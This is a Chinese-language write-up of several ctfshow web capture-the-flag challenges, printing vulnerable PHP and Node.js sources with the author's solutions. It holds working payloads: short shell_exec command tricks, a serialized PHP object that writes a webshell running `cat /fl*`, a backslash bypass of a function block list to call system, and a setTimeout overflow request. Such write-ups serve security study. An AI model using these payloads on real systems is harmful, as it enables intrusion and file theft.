ctfshow web

【nl】难了

 <?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<4){
     echo shell_exec($_GET[1]);
}
else{
     echo "hack!!!";
}
?>
//by Firebasky
//by Firebasky 

?1=>nl    //先写个文件
?1=*>b   //这样子会把所有文件名写在b里面，诶那是不是我们再访问b文件就执行了nl命令了

红包一

查看源代码发现getFlag()

控制台调用即可

一切看起来都那么合情合理

扫后台然后发现源码
inc.php

class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
        //写入文件可以利用这个来写命令
    }
}

index.php

if(isset($_SESSION['limit'])){
		$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);  //进行base64加密
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
	}else{
		 setcookie("limit",base64_encode('1'));
		 $_SESSION['limit']= 1;
	}

check.php

require_once 'inc/inc.php';   //找到了点

<?php
class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    
}
$a=new User("1.php","<?php system('cat /fl*');?>");

echo serialize($a);
由于是拼接写入所以前面要加管道符
|O:4:"User":3:{s:8:"username";s:5:"1.php";s:8:"password";s:26:"<?php system('cat fl*');?>";s:6:"status";N;}
fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czoyNjoiPD9waHAgc3lzdGVtKCdjYXQgZmwqJyk7Pz4iO3M6Njoic3RhdHVzIjtOO30K
?>

我们写入的文件名为log-1.php

没做出来，服了
应该是在inc/inc.php发包然后查看log-1.php
但是我的404了

红包题 耗子尾汁

error_reporting(0);
highlight_file(__FILE__);
$a = $_GET['a'];
$b = $_GET['b'];
function CTFSHOW_36_D($a,$b){
    $dis = array("var_dump","exec","readfile","highlight_file","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents","");
    $a = strtolower($a);
    if (!in_array($a,$dis,true)) {
        forward_static_call_array($a,$b);
    }else{
        echo 'hacker';
    }
}
CTFSHOW_36_D($a,$b);
echo "rlezphp!!!"; 

我们用反斜杠\绕过

forward_static_call_array($a, $b);：如果条件成立，则调用 forward_static_call_array() 函数，其作用是调用静态方法，具体参数含义如下：

$a：表示要调用的静态方法名。
$b：是一个数组，包含了要传递给静态方法的参数列表。

?a=\system&b[]=ls
?a=\system&b[]=cat f*

新年好？

const express = require('express');
const fs = require('fs');
const flag = require('./flag')
const app = express();

app.get('/flag', function (req, res) {   //看出来必须是在/flag页面
    function getflag(flag) {
      res.send(flag);
    }
    let delay = 10 * 1000;   这里定义是1e4所以自然就会超时
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(getflag, delay,flag);
    setTimeout(() => {
      clearTimeout(t);
      try {
        res.send('Timeout!');
      } catch (e) {
      }
    }, 1000);
});
app.get('/', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./app.js'));
});

app.listen(3000, '0.0.0.0', () => {
  console.log('Start listening')
});

浏览器内部使用32位带符号的整数，来储存推迟执行的时间。这意味着setTimeout最多只能推迟执行2147483647毫秒（24.8天）超过这个时间会发生溢出。

只要让其溢出就会回显flag的内容

/flag?delay=2200000000

Log4j复现

弹shell欠着